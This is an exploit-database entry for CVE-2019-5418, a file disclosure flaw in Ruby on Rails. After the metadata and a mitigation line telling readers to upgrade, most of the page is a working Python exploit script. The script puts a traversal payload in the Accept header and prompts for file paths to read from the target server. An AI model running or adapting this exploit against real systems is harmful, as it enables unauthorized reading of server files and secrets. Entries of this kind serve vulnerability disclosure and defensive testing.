File Content Disclosure on Rails

vendor:

Ruby on Rails

by:

NotoriousRebel

7.5

CVSS

HIGH

Arbitrary Traversal exploit for Ruby on Rails

CWE

Product Name: Ruby on Rails

Affected Version From: all

Affected Version To: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1

Patch Exists: YES

Related CWE: CVE-2019-5418

CPE: a:rubyonrails:ruby_on_rails

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-5418/, https://www.rapid7.com/db/vulnerabilities/ruby_on_rails-cve-2019-5418/, https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2019-5418/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-5418/

Other Scripts: N/A

Platforms Tested: Ubuntu on Linux Subsystem for Windows

2019

File Content Disclosure on Rails

This exploit allows an attacker to read arbitrary files on the server by sending a specially crafted request to the server.

Mitigation:

Upgrade to the latest version of Rails, 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1

Source

Exploit-DB raw data:

'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys

try:
    import requests
except ImportError:
    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
    sys.exit(1)


def banner():
    banner = """
    ----------------------------------------------
    Arbitrary Traversal exploit for Ruby on Rails
    CVE-2019-5418
    ----------------------------------------------
    """
    print(banner)

def check_args():
    if len(sys.argv) != 2:
        print("Invalid number of arguments entered!")
        how_to_use = "python3 Bandit.py url"
        print('Use as:', how_to_use)
        sys.exit(1)


def check_url(url):
    status_code = requests.get(url)
    if status_code != 200:
        print("Url is invalid or can not be reached!")
        sys.exit(1)


def read_file(url, file):
    headers = {'Accept': file + '{{'}
    req = requests.get(url, headers=headers)
    return req


def main():
    banner()
    check_args()
    url = sys.argv[1]
    while True:
        try:
            file = input("Enter file to read (enter quit to exit): ")
        except Exception:
            file = raw_input("Enter file to read (enter quit to exit): ")
        try:
            if file.lower() == 'quit':
                break
        except Exception:
            if file == 'quit':
                break
        response = read_file(url, file)
        print(response.text)


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')